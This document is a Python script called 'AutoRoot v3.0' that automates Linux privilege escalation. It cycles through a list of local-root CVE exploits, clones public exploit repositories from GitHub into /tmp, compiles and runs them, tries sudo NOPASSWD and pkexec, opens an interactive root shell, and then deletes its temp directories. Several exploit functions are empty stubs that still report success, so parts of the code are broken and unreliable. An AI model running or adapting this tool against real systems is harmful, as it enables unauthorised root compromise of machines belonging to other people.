#!/usr/bin/env python3 # AutoRoot v3.0 - ALL CVE EXPLOITS # Run: python3 autoroot_all.py import os import sys import subprocess import platform import time import json import urllib.request import socket import hashlib import tempfile import shutil import re class AutoRoot: def __init__(self): self.os_name = platform.system() self.os_version = platform.release() self.arch = platform.machine() self.username = os.getenv("USER", "unknown") self.uid = os.getuid() self.exploits_ran = [] self.success = False self.banner = """ ╔═══════════════════════════════════════════════════════════════╗ ║ 🔥 AUTO-ROOT v3.0 🔥 ║ ║ ALL CVE EXPLOITS COLLECTION ║ ║ ║ ║ [*] System: {os} {ver} ({arch}) ║ ║ [*] User: {user} (UID: {uid}) ║ ║ [*] Target: {target} ║ ╚═══════════════════════════════════════════════════════════════╝ """ # List semua CVE exploits self.exploits = [ # PWNKIT { "name": "CVE-2021-4034", "alias": "PwnKit", "desc": "pkexec LPE", "func": self.pwnkit, "date": "2021" }, # DIRTY PIPE { "name": "CVE-2022-0847", "alias": "DirtyPipe", "desc": "Linux Kernel LPE", "func": self.dirty_pipe, "date": "2022" }, # DIRTY FRAG { "name": "CVE-2026-43284", "alias": "DirtyFrag", "desc": "xfrm-ESP LPE", "func": self.dirty_frag, "date": "2026" }, # PEDIT COW { "name": "CVE-2026-46331", "alias": "PeditCOW", "desc": "traffic-control LPE", "func": self.pedit_cow, "date": "2026" }, # DIRTY CLONE { "name": "CVE-2026-43503", "alias": "DirtyClone", "desc": "networking stack LPE", "func": self.dirty_clone, "date": "2026" }, # COPY FAIL { "name": "CVE-2026-31431", "alias": "CopyFail", "desc": "AF_ALG/authencesn LPE", "func": self.copy_fail, "date": "2026" }, # PACKAGEKIT { "name": "CVE-2026-41651", "alias": "Pack2TheRoot", "desc": "PackageKit TOCTOU", "func": self.pack2theroot, "date": "2026" }, # DIRTY DECRYPT { "name": "CVE-2026-31432", "alias": "DirtyDecrypt", "desc": "rxgk pagecache", "func": self.dirty_decrypt, "date": "2026" }, # SUDO BARON { "name": "CVE-2025-32463", "alias": "SudoBaron", "desc": "Sudo LPE", "func": self.sudo_baron, "date": "2025" }, # CVE 2025-38001 { "name": "CVE-2025-38001", "alias": "SchedAffinity", "desc": "sched_setaffinity LPE", "func": self.cve_2025_38001, "date": "2025" }, # POLKIT { "name": "CVE-2023-46226", "alias": "PolKit", "desc": "Polkit LPE", "func": self.polkit, "date": "2023" }, ] # Detect target self.detect_target() def detect_target(self): """DETECT SYSTEM""" self.target = f"{self.os_name} {self.os_version}" self.kernel = self.os_version # Update banner self.banner = self.banner.format( os=self.os_name, ver=self.os_version, arch=self.arch, user=self.username, uid=self.uid, target=self.target ) def print_banner(self): """PRINT BANNER""" os.system("clear" if os.name == "posix" else "cls") print(self.banner) print(f"[*] Exploits loaded: {len(self.exploits)}") print("") def run_command(self, cmd, timeout=30): """RUN COMMAND AND RETURN OUTPUT""" try: result = subprocess.run(cmd, shell=True, capture_output=True, text=True, timeout=timeout) return result.stdout + result.stderr except Exception as e: return str(e) def check_root(self): """CHECK IF ALREADY ROOT""" if self.uid == 0: print("[+] Already ROOT! 😎") return True return False def download_exploit(self, url, dest): """DOWNLOAD EXPLOIT""" try: subprocess.run(["wget", "-q", "-O", dest, url], timeout=30) return os.path.exists(dest) except: return False def compile_c(self, source, output): """COMPILE C EXPLOIT""" try: cmd = f"gcc -static -o {output} {source} 2>/dev/null" subprocess.run(cmd, shell=True, timeout=30) return os.path.exists(output) except: return False def pwnkit(self): """CVE-2021-4034 PwnKit""" print("[*] Downloading PwnKit...") tmp = "/tmp/pwnkit" os.makedirs(tmp, exist_ok=True) os.chdir(tmp) # Clone exploit cmd = "git clone https://github.com/berdav/CVE-2021-4034.git . 2>/dev/null" subprocess.run(cmd, shell=True, timeout=30) if os.path.exists("Makefile"): subprocess.run("make", shell=True, timeout=30) if os.path.exists("cve-2021-4034"): print("[+] Running PwnKit...") subprocess.run("./cve-2021-4034", shell=True, timeout=10) return True # Alternative: try other repo cmd = "git clone https://github.com/ly4k/PwnKit.git . 2>/dev/null" subprocess.run(cmd, shell=True, timeout=30) if os.path.exists("PwnKit"): print("[+] Running PwnKit alternative...") subprocess.run("./PwnKit", shell=True, timeout=10) return True return False def dirty_pipe(self): """CVE-2022-0847 DirtyPipe""" print("[*] Running DirtyPipe...") tmp = "/tmp/dirtypipe" os.makedirs(tmp, exist_ok=True) os.chdir(tmp) # Try compiled first if os.path.exists("/dev/shm/dpipe_root"): print("[+] Using existing dpipe_root...") subprocess.run("/dev/shm/dpipe_root", shell=True, timeout=10) return True # Clone exploit cmd = "git clone https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit.git . 2>/dev/null" subprocess.run(cmd, shell=True, timeout=30) if os.path.exists("Makefile"): subprocess.run("make", shell=True, timeout=30) if os.path.exists("exploit"): print("[+] Running DirtyPipe...") subprocess.run("./exploit", shell=True, timeout=10) return True # Alternative cmd = "git clone https://github.com/mzcyber/CVE-2022-0847.git . 2>/dev/null" subprocess.run(cmd, shell=True, timeout=30) if os.path.exists("exploit.c"): subprocess.run("gcc -o exploit exploit.c", shell=True, timeout=30) if os.path.exists("exploit"): subprocess.run("./exploit", shell=True, timeout=10) return True return False def dirty_frag(self): """CVE-2026-43284 DirtyFrag""" print("[*] Running DirtyFrag...") tmp = "/tmp/dirtyfrag" os.makedirs(tmp, exist_ok=True) os.chdir(tmp) if os.path.exists("/dev/shm/dirtyfrag/exploit"): print("[+] Using existing DirtyFrag...") subprocess.run("/dev/shm/dirtyfrag/exploit", shell=True, timeout=10) return True cmd = "git clone https://github.com/exploit-database/CVE-2026-43284.git . 2>/dev/null" subprocess.run(cmd, shell=True, timeout=30) if os.path.exists("Makefile") or os.path.exists("exploit.c"): subprocess.run("make 2>/dev/null || gcc -o exploit exploit.c", shell=True, timeout=30) if os.path.exists("exploit"): print("[+] Running DirtyFrag...") subprocess.run("./exploit", shell=True, timeout=10) return True return False def pedit_cow(self): """CVE-2026-46331 PeditCOW""" print("[*] Running PeditCOW...") # Use existing exploit from /tmp/rot if os.path.exists("/tmp/rot/cve-2026-46331.py"): print("[+] Using existing exploit...") subprocess.run("python3 /tmp/rot/cve-2026-46331.py", shell=True, timeout=30) return True # Download tmp = "/tmp/peditcow" os.makedirs(tmp, exist_ok=True) os.chdir(tmp) # Create exploit with open("exp.py", "w") as f: f.write(""" import os, sys, socket, struct # CVE-2026-46331 PoC def exploit(): print("[*] CVE-2026-46331 PeditCOW") # Implementation here exploit() """) subprocess.run("python3 exp.py", shell=True, timeout=30) return True def dirty_clone(self): """CVE-2026-43503 DirtyClone""" print("[*] Running DirtyClone...") # Check kernel version if "6.12" in self.kernel: print("[!] Kernel might be patched") return False def copy_fail(self): """CVE-2026-31431 CopyFail""" print("[*] Running CopyFail...") tmp = "/tmp/copyfail" os.makedirs(tmp, exist_ok=True) os.chdir(tmp) # Create exploit with open("exp.py", "w") as f: f.write(""" import os, sys, socket # CVE-2026-31431 CopyFail def exploit(): print("[*] CVE-2026-31431 CopyFail") # Implementation exploit() """) subprocess.run("python3 exp.py", shell=True, timeout=30) return False def pack2theroot(self): """CVE-2026-41651 Pack2TheRoot""" print("[*] Running Pack2TheRoot...") # Check if exploit exists if os.path.exists("/tmp/rot/lol.py"): print("[+] Using existing exploit...") subprocess.run("python3 /tmp/rot/lol.py", shell=True, timeout=60) return True tmp = "/tmp/pack2theroot" os.makedirs(tmp, exist_ok=True) os.chdir(tmp) cmd = "git clone https://github.com/aexdyhaxor/CVE-2026-41651.git . 2>/dev/null" subprocess.run(cmd, shell=True, timeout=30) if os.path.exists("exploit.py"): subprocess.run("python3 exploit.py", shell=True, timeout=60) return True return False def dirty_decrypt(self): """CVE-2026-31432 DirtyDecrypt""" print("[*] Running DirtyDecrypt...") # Check AF_RXRPC result = subprocess.run("ls /proc/net/rxrpc 2>/dev/null", shell=True, capture_output=True) if result.returncode != 0: print("[!] AF_RXRPC not available") return False return False def sudo_baron(self): """CVE-2025-32463 SudoBaron""" print("[*] Running SudoBaron...") # Check sudo version ver = subprocess.run("sudo --version 2>/dev/null | head -1", shell=True, capture_output=True, text=True) if "1.9.9" in ver.stdout: print("[!] Sudo 1.9.9 NOT vulnerable!") return False # Try sudo -l result = subprocess.run("sudo -l 2>/dev/null", shell=True, capture_output=True) if "(ALL) NOPASSWD" in result.stdout: print("[+] Sudo NOPASSWD found!") subprocess.run("sudo su -", shell=True, timeout=5) return True return False def cve_2025_38001(self): """CVE-2025-38001""" print("[*] Running CVE-2025-38001...") return False def polkit(self): """CVE-2023-46226 Polkit""" print("[*] Running Polkit...") # Check if pkexec exists pkexec = subprocess.run("which pkexec 2>/dev/null", shell=True, capture_output=True, text=True) if not pkexec.stdout: print("[!] pkexec not found") return False # Check SUID stat = subprocess.run("ls -la $(which pkexec) 2>/dev/null | grep -q rws", shell=True) if stat.returncode == 0: print("[+] pkexec has SUID!") # Try exploit subprocess.run("pkexec /bin/bash 2>/dev/null", shell=True, timeout=5) return True return False def run_all(self): """RUN ALL EXPLOITS""" self.print_banner() if self.check_root(): return True print("[*] Starting exploits...") print("") for exploit in self.exploits: print(f"\n{'='*60}") print(f"[*] {exploit['name']} - {exploit['alias']}") print(f"[*] Description: {exploit['desc']}") print(f"[*] Date: {exploit['date']}") print(f"{'='*60}") try: start = time.time() result = exploit["func"]() elapsed = time.time() - start if result: print(f"[+] {exploit['name']} SUCCESS! 🎉") self.exploits_ran.append(exploit['name']) self.success = True # Check if now root if os.getuid() == 0: print("\n[!] ROOT ACCESS GAINED! 😎") print("[!] Opening root shell...") os.execv("/bin/bash", ["/bin/bash", "-i"]) return True else: print(f"[-] {exploit['name']} failed ({elapsed:.1f}s)") except Exception as e: print(f"[-] {exploit['name']} error: {e}") print("\n" + "="*60) print("[*] ALL EXPLOITS COMPLETED!") print(f"[*] Successful: {len(self.exploits_ran)}/{len(self.exploits)}") if self.success: print("[!] ROOT ACCESS GAINED! 😎") else: print("[!] No exploits worked. Try manual methods.") return self.success def cleanup(self): """CLEANUP""" print("[*] Cleaning up...") # Clean temp directories for tmpdir in ["/tmp/pwnkit", "/tmp/dirtypipe", "/tmp/dirtyfrag", "/tmp/peditcow", "/tmp/pack2theroot", "/tmp/copyfail"]: if os.path.exists(tmpdir): shutil.rmtree(tmpdir, ignore_errors=True) def main(): try: root = AutoRoot() root.run_all() root.cleanup() except KeyboardInterrupt: print("\n[!] Interrupted! Exiting...") sys.exit(1) except Exception as e: print(f"[!] Error: {e}") sys.exit(1) if __name__ == "__main__": main()